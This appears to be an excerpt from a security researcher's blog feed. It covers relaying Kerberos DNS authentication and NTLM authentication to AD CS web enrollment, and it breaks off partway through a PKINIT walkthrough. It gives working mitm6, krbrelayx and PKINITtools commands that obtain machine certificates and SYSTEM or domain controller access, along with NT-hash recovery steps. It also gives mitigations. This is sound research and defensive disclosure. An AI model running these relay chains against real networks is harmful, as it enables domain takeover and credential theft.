<p>It turns out this query contains a full GSSAPI and SPNEGO structure containing a Kerberos AP-REQ. This is essentially a normal Kerberos authentication flow to a service. The reply again contains a GSSAPI and SPNEGO structure, indicating that authentication succeeded and carrying an AP-REP. This AP-REP contains a new session key that can be used by the client to sign their DNS queries via a <code class="language-plaintext highlighter-rouge">TSIG</code> record. Note that the <code class="language-plaintext highlighter-rouge">encAPRepPart</code> is normally encrypted with the session key that only the client and the server know, but because I loaded the Kerberos keys of various systems in my test domain into a <a href="https://github.com/dirkjanm/forest-trust-tools/blob/master/keytab.py">keytab</a> that Wireshark accepts, we can decrypt the whole exchange to see what it contains.</p>

<p><img src="/assets/img/kerberos/dns_tkey_answer.png" alt="TKEY answer containing AP-REP" class="align-center" /></p>

<p>The concept of this flow is fairly simple (the actual implementation is not). The client uses Kerberos to authenticate and securely exchange a session key, and then uses that session key to sign further update queries. The server can store the key and the authenticated user/computer and process the updates in an authenticated manner without having to tie an authentication to a specific TCP socket, as later queries may be sent over UDP.</p>
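<p>The sign-then-verify flow can be sketched as follows. Note this is a conceptual stand-in: GSS-TSIG (RFC 3645) computes a GSSAPI MIC with the Kerberos session key rather than a plain HMAC, and the key name below is a placeholder. The important part is that the server looks the key up by the TKEY key name rather than by connection, so signed updates can arrive over UDP later:</p>

```python
import hmac, hashlib, os

# After the TKEY exchange, both sides hold the negotiated session key. The
# server stores it under the key name from the TKEY record, not per socket.
session_key = os.urandom(32)
server_keys = {"example-tkey-key": session_key}

def sign_query(key: bytes, dns_msg: bytes) -> bytes:
    # Stand-in for the GSS-TSIG signature; HMAC-SHA256 illustrates the flow
    return hmac.new(key, dns_msg, hashlib.sha256).digest()

def server_verify(key_name: str, dns_msg: bytes, sig: bytes) -> bool:
    key = server_keys.get(key_name)
    return key is not None and hmac.compare_digest(sign_query(key, dns_msg), sig)

update = b"...signed dynamic update..."
tsig = sign_query(session_key, update)
```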

<h2 id="abusing-dns-authentication">Abusing DNS authentication</h2>
<p>If we are in a position to intercept DNS queries, it is possible to trick the victim client into sending us a Kerberos ticket for the real DNS server. This interception can be done in the default Windows configuration by any system in the same (V)LAN using <a href="https://github.com/dirkjanm/mitm6">mitm6</a>. mitm6 advertises itself as a DNS server, which means that the victim will send the <code class="language-plaintext highlighter-rouge">SOA</code> query to our fake server, and authenticate using Kerberos if we refuse their dynamic update. Now this is where it gets a bit tricky. Usually the DNS server role will be running on a Domain Controller. So the service ticket for the DNS service will already be suitable for services running on the DC, since they use the same account and we can change the service name in the ticket. This means we can relay this ticket to for example LDAP. However, if we take a closer look at the authenticator in the TKEY query, we see that the flag that requests integrity (signing) is set.</p>

<p><img src="/assets/img/kerberos/krb_dns_signing.png" alt="Integrity flag set in authenticator" class="align-center" /></p>

<p>This will automatically trigger LDAP signing, which makes the whole attack fail since we can’t interact with LDAP afterwards without providing a valid cryptographic signature on each message. We can’t produce this signature since we relayed the authentication and do not actually possess the Kerberos keys required to decrypt the service ticket and extract the session key.</p>

<p>This initially made me hit a wall for two reasons:</p>

<ol>
  <li>At the time there weren’t any default high value services known that would accept authentication with the integrity flag set, but not enforce it on a protocol level.</li>
  <li>The client specifically requests the “dns” service class in the SPN they use in their Kerberos ticket request. This SPN is only set on actual DNS servers, so the number of legitimate hosts to relay to would be quite low.</li>
</ol>

<p>Revisiting this after reading James’ blog, I realized neither of these is an issue with today’s knowledge:</p>

<ol>
  <li>Since the AD CS research was <a href="https://posts.specterops.io/certified-pre-owned-d95910965cd2">published</a> by Lee Christensen and Will Schroeder, we have a high-value endpoint that is present in most AD environments, and provides code execution possibilities on the victim, as described in my <a href="https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/">last blog on AD CS relaying</a>.</li>
  <li>As James describes in his <a href="https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html">blog</a>, many service classes will actually implicitly map to the HOST class. As it turns out, this includes DNS, so when our victim requests a ticket for the DNS service, this actually works for any account with the HOST SPN. This is set on all computer accounts in the domain by default, so any service running under these accounts can be targeted.</li>
</ol>
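<p>This implicit mapping is driven by the <code class="language-plaintext highlighter-rouge">sPNMappings</code> attribute in the configuration partition, which by default maps a long list of service classes (including <code class="language-plaintext highlighter-rouge">dns</code>) onto <code class="language-plaintext highlighter-rouge">HOST</code>. A rough sketch of the lookup, with a trimmed subset of the default list (treat the exact contents as an assumption):</p>

```python
# Trimmed subset of the default sPNMappings value; the full list lives on
# CN=Directory Service,CN=Windows NT,CN=Services in the configuration
# partition and maps several dozen service classes onto HOST.
SPN_MAPPINGS = {
    "host": {"dns", "cifs", "http", "www", "rpc", "wins", "spooler",
             "netlogon", "schedule", "time", "eventlog"},
}

def effective_service_class(spn: str) -> str:
    """Service class the KDC effectively uses when looking up an SPN."""
    svc = spn.split("/", 1)[0].lower()
    for target, aliases in SPN_MAPPINGS.items():
        if svc in aliases:
            return target
    return svc
```

<p>So a ticket request for <code class="language-plaintext highlighter-rouge">DNS/somehost</code> is satisfied by any account that merely has the <code class="language-plaintext highlighter-rouge">HOST/somehost</code> SPN registered.</p>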

<p>With these 2 solved, there’s nothing really that prevents us from forwarding the Kerberos authentication we receive on our fake DNS server to AD CS. When that is done we can request certificates for the computer account we relayed, and use the NT hash recovery technique or the S4U2Self trick that I talked about in my <a href="https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/">previous blog</a>. Using these techniques we can get <code class="language-plaintext highlighter-rouge">SYSTEM</code> access on the victim computer, which effectively makes this a reliable RCE as long as an AD CS http endpoint is available for relaying.</p>

<h1 id="changes-to-krbrelayx-and-mitm6">Changes to krbrelayx and mitm6</h1>
<p>Originally, krbrelayx was not really a relaying tool. Instead it was capturing Kerberos TGTs by using accounts configured with unconstrained delegation, and using those TGTs in the same manner as ntlmrelayx can use incoming NTLM authentication. Since there is now a use case to actually relay Kerberos authentication, I’ve updated the functionality in krbrelayx to make it possible to run in relay mode instead of in unconstrained delegation mode. It will actually default to this mode if you don’t specify any NT hashes or AES keys that could be used to extract information from incoming Kerberos authentication. In short, krbrelayx can now be used to relay Kerberos authentication, though only relaying to HTTP and LDAP is supported. As for mitm6, I’ve added the option to specify a relay target, which will be the hostname in the authoritative nameserver response when a victim queries the SOA record. This will make the victim request a Kerberos service ticket for the service we are targeting rather than for the legitimate DNS server.</p>

<p>One thing to note is that this works best when the AD CS server that is targeted is not the DC that the victim is using for Kerberos operations. If they are on the same host (such as in smaller or lab environments) targeting the server which is both a KDC and AD CS server may result in the victim sending its Kerberos ticket requests (TGS-REQ) to you instead of the DC. While you could proxy this traffic, this is beyond the scope of this project and you may end up not getting any authentication data.</p>

<p>There is one final hurdle to clear. The Kerberos AP-REQ actually does not tell us which user is authenticating; this is only specified in the encrypted part of the Authenticator. So we don’t know which user or machine account is authenticating to us. Luckily for us, this does not really matter in the default AD CS templates scenario, since these allow any name to be specified as CN and it is overwritten by the name in Active Directory anyway. To obtain the best results however, I recommend you scope the attack to one host at a time using mitm6, and to specify that hostname with <code class="language-plaintext highlighter-rouge">--victim</code> in krbrelayx so it will fill in the fields correctly.</p>

<h1 id="attack-example">Attack example</h1>
<p>Let’s see how this looks in practice. First we set up krbrelayx, specifying the AD CS host (in my lab <code class="language-plaintext highlighter-rouge">adscert.internal.corp</code>) as target, and specifying the IPv4 address of our interface as the address to bind the DNS server to. This prevents conflicts with DNS servers that commonly listen on the loopback adapter on for example Ubuntu.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo krbrelayx.py --target http://adscert.internal.corp/certsrv/ -ip 192.168.111.80 --victim icorp-w10.internal.corp --adcs --template Machine
</code></pre></div></div>

<p>Then we set up mitm6, using the name of the AD CS host as relay target:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo mitm6 --domain internal.corp --host-allowlist icorp-w10.internal.corp --relay adscert.internal.corp -v
</code></pre></div></div>

<p>We wait for our victim to get an IPv6 address and connect to our rogue server:</p>

<p><img src="/assets/img/kerberos/dns_relay.png" alt="mitm6 giving out IPv6 addresses and triggering authentication" class="align-center" /></p>

<p>The screenshot shows that the victim tried to update their DNS record, which we refused because no authentication was provided. The authentication is sent via TCP to the DNS server of krbrelayx, which accepts it and forwards it to AD CS:</p>

<p><img src="/assets/img/kerberos/adcs_relayed_dns.png" alt="krbrelayx forwarding the authentication to AD CS and obtaining a certificate" class="align-center" /></p>

<p>On the wire, we see the expected flow:</p>

<p><img src="/assets/img/kerberos/krb_dns_wire.png" alt="Kerberos relaying on the wire" class="align-center" /></p>

<ul>
  <li>The victim (<code class="language-plaintext highlighter-rouge">192.168.111.73</code>) queries for a SOA record of their hostname.</li>
  <li>We indicate that our rogue DNS server is the authoritative nameserver, to which the victim will send their dynamic update query.</li>
  <li>The query is refused by mitm6, which will indicate to the victim that they need to authenticate their query.</li>
  <li>The client talks to the KDC to get a Kerberos ticket for the service we indicated.</li>
  <li>The client establishes a TCP connection to krbrelayx and sends a TKEY query containing the Kerberos ticket.</li>
  <li>The ticket is forwarded to the AD CS host which results in our authentication succeeding and a certificate being issued.</li>
</ul>

<p>With this certificate we can use <a href="https://github.com/dirkjanm/PKINITtools">PKINITtools</a> (or <a href="https://github.com/GhostPack/Rubeus">Rubeus</a> on Windows) to authenticate using Kerberos and impersonate a Domain Admin to gain access to our victim (in this case <code class="language-plaintext highlighter-rouge">icorp-w10</code>):</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python gettgtpkinit.py -pfx-base64 MIIRFQIBA..cut...lODSghScECP5hGFE3PXoz internal.corp/icorp-w10$ icorp-w10.ccache
</code></pre></div></div>

<p>With smbclient.py we can list the C$ drive to prove we have admin access:</p>

<p><img src="/assets/img/kerberos/systemaccess.png" alt="Certificate based Kerberos auth resulting in admin access on our victim" class="align-center" /></p>

<h1 id="defenses">Defenses</h1>
<p>This technique abuses insecure defaults in Windows and Active Directory. The primary issues here are the preference for IPv6 in Windows, and the bad security defaults on the AD CS web applications. These can be mitigated as follows:</p>

<h2 id="mitigating-mitm6">Mitigating mitm6</h2>
<p>mitm6 abuses the fact that Windows queries for an IPv6 address even in IPv4-only environments. If you don’t use IPv6 internally, the safest way to prevent mitm6 is to block DHCPv6 traffic and incoming router advertisements in Windows Firewall via Group Policy. Disabling IPv6 entirely may have unwanted side effects. Setting the following predefined rules to Block instead of Allow prevents the attack from working:</p>
<ul>
  <li><em>(Inbound) Core Networking - Dynamic Host Configuration Protocol for IPv6(DHCPV6-In)</em></li>
  <li><em>(Inbound) Core Networking - Router Advertisement (ICMPv6-In)</em></li>
  <li><em>(Outbound) Core Networking - Dynamic Host Configuration Protocol for IPv6(DHCPV6-Out)</em></li>
</ul>

<h2 id="mitigating-relaying-to-ad-cs">Mitigating relaying to AD CS</h2>
<p>The default <code class="language-plaintext highlighter-rouge">CertSrv</code> site does not use TLS; this should be enforced before further protections can be enabled. After enabling TLS with a valid certificate, enabling Extended Protection for authentication in IIS will prevent relay attacks. This should be enabled on all the web-based enrollment features of AD CS on all individual CA servers that offer this service.</p>
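<p>To verify the mitigation landed, you can probe whether the enrollment endpoint still offers NTLM over plain HTTP (the precondition for the relay). The sketch below builds a minimal NTLMSSP NEGOTIATE message with the Python standard library; the probe function is illustrative and obviously needs network access to the CA:</p>

```python
import base64, struct

def ntlm_negotiate_header() -> str:
    """Authorization header carrying a minimal NTLMSSP NEGOTIATE (type 1)."""
    msg = b"NTLMSSP\x00"                      # signature
    msg += struct.pack("<I", 1)               # message type 1
    msg += struct.pack("<I", 0x00000207)      # Unicode | OEM | RequestTarget | NTLM
    msg += struct.pack("<HHI", 0, 0, 0) * 2   # empty domain + workstation fields
    return "NTLM " + base64.b64encode(msg).decode()

def offers_ntlm_over_http(host: str) -> bool:
    """True if /certsrv/ answers our negotiate with an NTLM challenge over
    plain HTTP, i.e. the relay precondition still holds (requires network)."""
    import http.client
    conn = http.client.HTTPConnection(host, 80, timeout=5)
    conn.request("GET", "/certsrv/", headers={"Authorization": ntlm_negotiate_header()})
    resp = conn.getresponse()
    return resp.status == 401 and any(
        k.lower() == "www-authenticate" and v.startswith("NTLM ")
        for k, v in resp.getheaders())
```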

<h1 id="tools">Tools</h1>
<p>All the tools mentioned in this blog are available as open source tools on GitHub.</p>

<ul>
  <li>mitm6 <a href="https://github.com/dirkjanm/mitm6">https://github.com/dirkjanm/mitm6</a></li>
  <li>krbrelayx <a href="https://github.com/dirkjanm/krbrelayx">https://github.com/dirkjanm/krbrelayx</a></li>
  <li>PKINITtools <a href="https://github.com/dirkjanm/PKINITtools">https://github.com/dirkjanm/PKINITtools</a></li>
</ul>

<p>Thanks to all the people mentioned in this blog and my previous posts on these topics for their research and tool contributions.</p>]]></content><author><name>Dirk-jan Mollema</name></author><summary type="html"><![CDATA[One thing I love is when I think I understand a topic well, and then someone proves me quite wrong. That was more or less what happened when James Forshaw published a blog on Kerberos relaying, which disproves my conclusion that you can’t relay Kerberos from a few years ago. James showed that there are some tricks to make Windows authenticate to a different Service Principal Name (SPN) than what would normally be derived from the hostname the client is connecting to, which means Kerberos is not fully relay-proof as I assumed. This triggered me to look into some alternative abuse paths, including something I worked on a few years back but could never get to work: relaying DNS authentication. This is especially relevant when you have the ability to spoof a DNS server via DHCPv6 spoofing with mitm6. In this scenario, you can get victim machines to reliably authenticate to you using Kerberos and their machine account. This authentication can be relayed to any service that does not enforce integrity, such as Active Directory Certificate Services (AD CS) http(s) based enrollment, which in turn makes it possible to execute code as SYSTEM on that host as discussed in my blog on AD CS relaying. This technique is faster, more reliable and less invasive than relaying WPAD authentication with mitm6, but does of course require AD CS to be in use. 
This blog describes the background of the technique and the changes I made to krbrelayx to support Kerberos relaying for real this time.]]></summary></entry><entry><title type="html">NTLM relaying to AD CS - On certificates, printers and a little hippo</title><link href="https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/" rel="alternate" type="text/html" title="NTLM relaying to AD CS - On certificates, printers and a little hippo" /><published>2021-07-28T17:08:57+00:00</published><updated>2021-07-28T17:08:57+00:00</updated><id>https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services</id><content type="html" xml:base="https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/"><![CDATA[<p>I did not expect NTLM relaying to be a big topic again in the summer of 2021, but among printing nightmares and bad ACLs on registry hives, there has been quite some discussion around this topic. Since there seems to be some confusion out there on the how and the why, and new attack vectors coming up fast now, I figured I’d write a short post with some more details and background. Hardly anything here is my own research, so I don’t take credit for any of this, but since these issues are “by design” and will likely not see a patch or significant change soon, they are quite relevant. That’s why I decided to write some Python tools around it and explain the process in this post. The tools are available on my <a href="https://github.com/dirkjanm/PKINITtools">GitHub</a>.</p>

<h2 id="background---the-state-of-ntlm-relaying">Background - the state of NTLM relaying</h2>
<p>I’ve written quite a few times about NTLM relaying ever since I started contributing to ntlmrelayx in 2017. Despite the mitigations that have been introduced since the first NTLM relay attacks around 2001, the past few years have seen many new exploits, but hardly any new mitigations to make this horrible protocol more secure. Even the scheduled change to <a href="https://support.microsoft.com/en-us/topic/2020-ldap-channel-binding-and-ldap-signing-requirements-for-windows-ef185fb8-00f7-167d-744c-f299a66fc00a">enforce LDAP signing and channel binding</a> by default, which was supposed to be deployed in 2020, ultimately did not ship, likely due to many third-party products not being compatible with this. This meant that in the default state with fully up-to-date systems, it was possible to:</p>

<ul>
  <li>Relay NTLM authentication occurring over HTTP to LDAP, resulting in <a href="https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/">computer account takeover</a></li>
  <li>Relay authentication over SMB to HTTP endpoints, but not to LDAP because of a signing requirements <a href="https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/">mismatch</a>. Since no research was published on high-value default HTTP endpoints, this prevented exploitation of ways to get authenticated SMB connections via the infamous <a href="https://github.com/leechristensen/SpoolSample/">Printer Bug</a>.</li>
</ul>

<p>This all changed when <a href="https://twitter.com/tifkin_">Lee Christensen</a> and <a href="https://twitter.com/harmj0y">Will Schroeder</a> published their whitepaper on <a href="https://posts.specterops.io/certified-pre-owned-d95910965cd2">abusing Active Directory Certificate Services</a>. In this whitepaper they describe an attack called ESC8, which involves NTLM relaying to the HTTP interface part of the certificate service, which issues certificates. Because this interface accepts NTLM authentication without support for signing, it is possible to:</p>

<ol>
  <li>Request an authenticated back-connect with the Printer Bug over MS-RPRN, as long as the spool service is running on the victim system.</li>
  <li>Receive this authentication and relay this to the certificate services web interface.</li>
  <li>Request a certificate on behalf of the victim system.</li>
  <li>Use the issued certificate to impersonate the victim system.</li>
  <li>Either use the privileges of the victim system directly (for example in the case of a Domain Controller), or use Kerberos features to request a service ticket with administrative access to the host itself, or recover the NT hash of the computer account, which allows you to create a silver ticket.</li>
</ol>

<p>The printer bug has already been known for quite a while and has been a component in many attacks. Disabling the printer spooler service has been a common recommendation ever since, and has recently been brought to light again with the PrintNightmare exploit, which also relied on the spooler service being active. It was kind of a given that other methods of coercing authentication via RPC must exist, and I expect some are also keeping these private. Following the AD CS release, <a href="https://twitter.com/topotam77">Lionel Gilles</a> released a new proof-of-concept called <a href="https://github.com/topotam/PetitPotam">PetitPotam</a> last week. Unlike the printer bug, which uses MS-RPRN and requires authentication, this attack is an alternative method that does not rely on the printer spooler service being active, and does not require authentication when attacking a Domain Controller. This makes it an even more valuable attack alternative, as there is no official way as of now to disable this authenticated callback and there is no indication of a fix in sight.</p>

<h2 id="exploring-ad-cs-relaying">Exploring AD CS relaying</h2>
<p>After Will and Lee published their whitepaper, I was curious whether I could reproduce their attack on relaying to the certificate services web interface. ntlmrelayx is plugin based and quite modular, so the only thing that would likely be required is changing the <a href="https://github.com/SecureAuthCorp/impacket/blob/master/impacket/examples/ntlmrelayx/attacks/httpattack.py">http attack</a> method to post the right data. After ensuring the web enrollment service is installed in my lab, I went to have a look at the source code of the service. This source is stored in <code class="language-plaintext highlighter-rouge">C:\Windows\system32\CertSrv\en-US</code> on the server where the AD CS service is installed (in my case and in many others this will probably be the Domain Controller). I imagine the last folder may be different if you installed your system in a different language. Since the pages are written in classic ASP, it is not that hard to read the source code. The copyright mentions 1998 - 1999, which is always a great sign if you’re looking for things with a less than ideal security configuration.</p>

<p>When visiting the AD CS web interface at <code class="language-plaintext highlighter-rouge">http://dc-hostname/certsrv/</code>, we can authenticate using NTLM and a machine account. An easy way to obtain a machine account is with impacket’s <code class="language-plaintext highlighter-rouge">addcomputer.py</code>, which can be used as any authenticated user to add a new computer account by default (note that we’re only doing this to understand the attack in the lab, this is not required for the final attack). We can then use NTLM to authenticate to the AD CS web service (it’s easier to do this from a non-domain joined computer or from a browser that doesn’t perform Single Sign On). In this case I’m using Chrome, which can perform NTLM auth by using the <code class="language-plaintext highlighter-rouge">computername$@domain.fqdn</code> syntax in the credential prompt. This lets us authenticate as a computer account to the web service. Upon following the certificate request process, we get the following error message: “No certificate templates could be found. You do not have permission to request a certificate from this CA, or an error occurred while accessing the Active Directory.”. At first I thought this indicated a problem with my setup, because computer certificate templates are available by default. After some debugging and reading the source I found the reason in <code class="language-plaintext highlighter-rouge">certsgcl.inc</code>:</p>

<p><img src="/assets/img/adcs/cert_machine.png" alt="Machine certificates are not selected by the web UI" class="align-center" /></p>

<p>As we can see in the highlighted section, whenever the “choice” of certificate templates is rendered in the web page, the server does not actually query for machine templates. The reasoning behind this is probably that machines are not quite supposed to use the guided way of requesting certificates, so it doesn’t make sense to render them. Does this mean that we can’t request machine certificates via this interface? Not quite, as the page where the final request is submitted does not actually perform this check but simply submits the request to the CA, so we could use any certificate template here. I’ve patched the file and added the constant to also search for machine templates, and the template appears in the UI:</p>

<p><img src="/assets/img/adcs/patchedreq.png" alt="Patched web UI to show computer template" class="align-center" /></p>

<p>Now we can submit a basic request. The only requirement is that we select the correct template (Computer) and use the hostname of our newly created computer as the Common Name. Note that this must match the <code class="language-plaintext highlighter-rouge">dNSHostname</code> attribute of the computer object, so make sure you run <code class="language-plaintext highlighter-rouge">addcomputer.py</code> with the <code class="language-plaintext highlighter-rouge">-method LDAPS</code> option, otherwise this won’t be the case for our test account. We can create the request with openssl and then submit it. We see that it is immediately issued to us, because the default Computer template does not require approval.</p>

<p><img src="/assets/img/adcs/manualcertreq.png" alt="Openssl request" class="align-center" /></p>

<p><img src="/assets/img/adcs/issued.png" alt="Cert issued" class="align-center" /></p>
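The openssl step above can also be done in Python, which is closer to what we need for automating this later. A minimal sketch using the <code class="language-plaintext highlighter-rouge">cryptography</code> library; the hostname here is a placeholder for the <code class="language-plaintext highlighter-rouge">dNSHostname</code> of your test account:

```python
from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.x509.oid import NameOID

def build_csr(dns_hostname: str):
    # Generate a fresh key and a CSR whose Common Name matches the
    # computer object's dNSHostname attribute
    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    csr = (
        x509.CertificateSigningRequestBuilder()
        .subject_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, dns_hostname)]))
        .sign(key, hashes.SHA256())
    )
    return key, csr

key, csr = build_csr("testpc01.corp.local")
csr_pem = csr.public_bytes(serialization.Encoding.PEM).decode()
```

The resulting PEM can be pasted into the web form just like an openssl-generated request.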

<p>Requesting this with the dev tools open will show us the POST request, which goes to <code class="language-plaintext highlighter-rouge">certfnsh.asp</code>.</p>

<p><img src="/assets/img/adcs/certpost.png" alt="Cert issued" class="align-center" /></p>

<p>With this information we can build our custom AD CS relay attack. The <a href="https://github.com/SecureAuthCorp/impacket/blob/master/impacket/examples/ntlmrelayx/attacks/httpattack.py">http attack</a> template in ntlmrelayx starts us off with an authenticated session. Building on this, we can create a private key and certificate request on the fly and submit the request to the CA. After submitting the request, we get the certificate that was issued to us and can use it to authenticate.</p>
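For illustration, a hedged sketch of how the form body for <code class="language-plaintext highlighter-rouge">certfnsh.asp</code> could be assembled. The field names follow what the classic ASP pages submit as far as I could reconstruct from the dev tools capture; the PEM here is a dummy placeholder:

```python
import urllib.parse

def build_certfnsh_body(csr_pem: str, template: str = "Computer") -> str:
    # The page submits the base64 request body without the PEM armor lines
    csr_b64 = "".join(
        line for line in csr_pem.splitlines() if "-----" not in line
    )
    fields = {
        "Mode": "newreq",
        "CertRequest": csr_b64,
        "CertAttrib": f"CertificateTemplate:{template}",
        "TargetStoreFlags": "0",
        "SaveCert": "yes",
    }
    return urllib.parse.urlencode(fields)

body = build_certfnsh_body(
    "-----BEGIN CERTIFICATE REQUEST-----\nMIIB\n-----END CERTIFICATE REQUEST-----"
)
```

This body is then POSTed to <code class="language-plaintext highlighter-rouge">/certsrv/certfnsh.asp</code> inside the relayed NTLM session.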

<p>The template that can be used depends on the account that is relayed. For a member server or workstation, the template would be “Computer”. For Domain Controllers this template gives an error because a DC is not a regular server and is not a member of “Domain Computers”. So if you’re relaying a DC then the template should be “DomainController” to match.</p>
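The template choice above is a simple decision rule; a tiny helper capturing it (the function name is mine, not part of any tool):

```python
def pick_template(relayed_account: str, is_domain_controller: bool = False) -> str:
    # Machine accounts end in $; DCs are not members of "Domain Computers",
    # so they need the DomainController template instead of Computer
    if not relayed_account.endswith("$"):
        raise ValueError("expected a machine account (ending in $)")
    return "DomainController" if is_domain_controller else "Computer"
```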

<p>I did not initially want to publish the exploit code because Will and Lee also held off publishing theirs, but of course several people managed to reproduce the same attack pattern as above based on the whitepaper. A <a href="https://github.com/SecureAuthCorp/impacket/pull/1101">pull request</a> for impacket soon appeared by user ExAndroidDev, which implements more or less the same code. If you’re curious about my implementation, I included a proof-of-concept version of the <a href="https://github.com/dirkjanm/PKINITtools/blob/master/ntlmrelayx/httpattack.py">http attack</a> file in the PKINITtools repository. If you want to play with this template you’ll have to change the template and the domain manually before copying it to the correct impacket directory and running ntlmrelayx. Below is an example of the attack running:</p>

<p><img src="/assets/img/adcs/petitpotam.png" alt="Running petitpotam" class="align-center" /></p>

<p><img src="/assets/img/adcs/adcsrelay.png" alt="Obtaining a certificate" class="align-center" /></p>

<p>Note that this is <strong>fully unauthenticated</strong> (a feature of PetitPotam when used against DCs) and instantly escalates to Domain Controller privileges.</p>

<h2 id="abusing-the-obtained-certificate---diving-into-pkinit">Abusing the obtained certificate - diving into PKINIT</h2>
<p>To actually use these certificates for Kerberos with PKINIT, we can use either <a href="https://github.com/GhostPack/Rubeus/">Rubeus</a> or <a href="https://github.com/gentilkiwi/kekeo">kekeo</a>. Both of these tools have the downside that they only work on Windows. Originally I wanted to see if I could also port the PKINIT functionality to impacket, because if I could manage to get a regular TGT from the initial PKINIT operation, this would allow us to use it with the other impacket tools such as secretsdump and smbclient without any additional changes. I went down the rabbit hole of implementing the PKINIT ASN1 structures in impacket, but soon found out that the PKINIT specification itself uses structures from a multitude of different RFCs for its cryptographic operations. I did some more searching for projects that already used PKINIT in Python and found that <a href="https://github.com/morRubin/AzureADJoinedMachinePTC">AzureADJoinedMachinePTC</a> has an impacket-based implementation, and that SkelSec’s <a href="https://github.com/skelsec/minikerberos">minikerberos</a> has a custom implementation as well. Both of these implementations are written for Azure AD joined devices to use SMB and authenticate with certificates. This differs from our goal because Azure AD uses user-to-user (U2U) Kerberos without a central KDC, and the PKINIT process is embedded in NegoEx over SMB. For using certificates in Active Directory, we don’t need the U2U implementation or the NegoEx parts, but most of the code for PKINIT was already there, so I decided to build on that rather than reinvent the wheel. The minikerberos project was the implementation of choice because AzureADJoinedMachinePTC does not actually implement the required signing operations in Python, but uses Windows APIs for that, which prevents it from working on other operating systems.</p>

<p>I will save you the rant about ASN1 and the many hours it took me to figure out that Active Directory, for some reason, does not consider Diffie-Hellman parameters generated by the <code class="language-plaintext highlighter-rouge">cryptography</code> library strong enough (I could not find any documentation about the requirements or about why this is), so I had to borrow some known-safe primes instead. The end result is a simple command line tool that can take a certificate and private key, either in PFX or in PEM format, and request a TGT using PKINIT.</p>
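The known-safe primes in question are the well-known MODP groups. As an illustrative sketch (I’m using the 2048-bit group 14 from RFC 3526 here purely as an example; I’m not claiming this is the exact group the tool ships), loading a published prime into the <code class="language-plaintext highlighter-rouge">cryptography</code> library instead of generating fresh parameters looks like this:

```python
from cryptography.hazmat.primitives.asymmetric import dh

# 2048-bit MODP group 14 prime from RFC 3526, section 3 (generator is 2)
RFC3526_GROUP14_P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD1"
    "29024E088A67CC74020BBEA63B139B22514A08798E3404DD"
    "EF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245"
    "E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3D"
    "C2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F"
    "83655D23DCA3AD961C62F356208552BB9ED529077096966D"
    "670C354E4ABC9804F1746C08CA18217C32905E462E36CE3B"
    "E39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9"
    "DE2BCBF6955817183995497CEA956AE515D2261898FA0510"
    "15728E5A8AACAA68FFFFFFFFFFFFFFFF",
    16,
)

# Build DH parameters from the fixed group instead of generate_parameters()
params = dh.DHParameterNumbers(RFC3526_GROUP14_P, 2).parameters()
private_key = params.generate_private_key()
```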

<p><img src="/assets/img/adcs/gettgtpkinit.png" alt="Request TGT using PKINIT" class="align-center" /></p>

<h3 id="obtaining-the-nt-hash-of-the-impersonated-computer-account">Obtaining the NT hash of the impersonated computer account</h3>
<p>One of the features described in the <a href="https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf">whitepaper</a> from Will and Lee is the ability to obtain the original NT hash for an account by using the certificate. This is described as “THEFT5” in the whitepaper. The reason behind this is that when certificate authentication is used and a TGT is obtained, there has to be some way for the account performing the authentication to fall back to NTLM authentication if Kerberos is not supported. For that reason, the KDC will supply the NT hash of the account in the PAC that is added to the TGT (if you’re not sure what a PAC is or what is in there, I recommend you read <a href="https://dirkjanm.io/active-directory-forest-trusts-part-one-how-does-sid-filtering-work/">my blog on forest trusts</a>).</p>

<p>There is an interesting process involved in this. Whenever PKINIT authentication is used, the KDC adds the NT hash in encrypted form to the PAC. It is encrypted with the same key that is negotiated between the KDC and the client for encrypting the session key of the TGT. This key is negotiated via Diffie-Hellman key exchange or encrypted with the public key of the certificate, depending on the implementation. The result is a key called the “AS reply key” in the <a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pac/cc919d0c-f2eb-4f21-b487-080c486d85fe">documentation in MS-PAC</a>. The PAC is contained inside the TGT, which is encrypted with one of the Kerberos keys of the <code class="language-plaintext highlighter-rouge">krbtgt</code> account. This makes it impossible for our client to actually read the PAC.</p>

<p>Reading the PAC and accessing the NT hash is done via the Kerberos user-to-user (U2U) extension. This extension <a href="https://datatracker.ietf.org/doc/html/draft-ietf-cat-user2user-02">introduces</a> an option called <code class="language-plaintext highlighter-rouge">ENC-TKT-IN-SKEY</code>, which encrypts the resulting service ticket with the session key from a supplied TGT rather than with the key of the target service/user. This session key is in our possession (we need it to use our TGT), so we can use it to decrypt the service ticket containing the PAC. The whole process is as follows:</p>

<ol>
  <li>Request a TGT using PKINIT and note down the AS reply key (the <code class="language-plaintext highlighter-rouge">gettgtpkinit.py</code> tool prints the key for you as you can see in the screenshot above).</li>
  <li>Request a service ticket to ourself, while supplying the <code class="language-plaintext highlighter-rouge">ENC-TKT-IN-SKEY</code> option and adding the TGT that was issued to us to the “additional tickets” section of the <code class="language-plaintext highlighter-rouge">TGS-REQ</code>.</li>
  <li>The KDC will copy over the PAC, with the encrypted NT hash, to the ticket that is issued, and will encrypt this ticket with the session key of our TGT (which is known to us).</li>
